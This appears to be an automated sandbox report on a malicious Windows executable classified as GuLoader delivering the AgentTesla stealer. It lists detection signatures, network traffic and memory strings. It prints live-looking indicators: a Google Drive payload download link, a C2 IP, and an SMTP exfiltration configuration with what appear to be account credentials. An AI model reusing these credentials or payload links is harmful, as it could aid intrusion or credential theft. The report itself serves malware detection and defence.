Windows Analysis Report
FRACCIONAMIENTO 1722403906461L.exe

Overview

General Information

Sample Name: FRACCIONAMIENTO 1722403906461L.exe
Analysis ID: 612103
MD5: 04e8c57a5df1834c590c49ccc8734d6e
SHA1: b53b20975776cc58ed77d8bfff905303aa84391e
SHA256: 345aa66f6945c8fadee442f115591eaa694196c3ec207246814b5c90ab39df0a
Infos:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Outbound SMTP Connections
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000003.00000000.15477945295.0000000000BC0000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E"}
Source: conhost.exe.956.4.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "titkarsag@ferdi.huQ1w2e3r4t5!mail.ferdi.hulucassevirus@gmail.com"}
Multi AV Scanner detection for submitted file
Source: FRACCIONAMIENTO 1722403906461L.exe Virustotal: Detection: 27% Perma Link
Source: FRACCIONAMIENTO 1722403906461L.exe ReversingLabs: Detection: 12%
Uses 32bit PE files
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Finlandsrejserne Jump to behavior
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TARHELYHU TARHELYHU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.51.191.23 185.51.191.23
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9ri2cnupcf3pilpptme4k7l2h/1650461475000/18066694053602596605/*/1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49786 -> 185.51.191.23:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49786 -> 185.51.191.23:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:23 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:32 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:41 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:51 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:29:56 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:05 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:15 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:23 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:29 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:36 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:41 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:30:50 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:00 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:08 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:17 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:23 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:32 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 1103Content-Type: text/html; charset=UTF-8Date: Wed, 20 Apr 2022 13:31:39 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Connection: close
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000003.00000002.20397299424.000000001D33C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://GeLRtI.com
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17099903213.000000001C0E1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20398038371.000000001D3CB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20397764298.000000001D39E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://YCkYMz5eVEN7dA.org
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://YCkYMz5eVEN7dA.orgt-
Source: CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: CasPol.exe, 00000003.00000003.17282304601.0000000020183000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: CasPol.exe, 00000003.00000003.17282304601.0000000020183000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: FRACCIONAMIENTO 1722403906461L.exe String found in binary or memory: http://aia.mesince.com/ms-tsa.cer02
Source: FRACCIONAMIENTO 1722403906461L.exe String found in binary or memory: http://aia.mesince.com/ms.cer0
Source: CasPol.exe, 00000003.00000002.20397811168.000000001D3A2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372959813.00000000010AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372758608.000000000108C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: CasPol.exe, 00000003.00000002.20404063483.00000000200E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17282017189.00000000201CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CasPol.exe, 00000003.00000002.20397811168.000000001D3A2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372959813.00000000010AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20372758608.000000000108C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.letsencrypt.org0
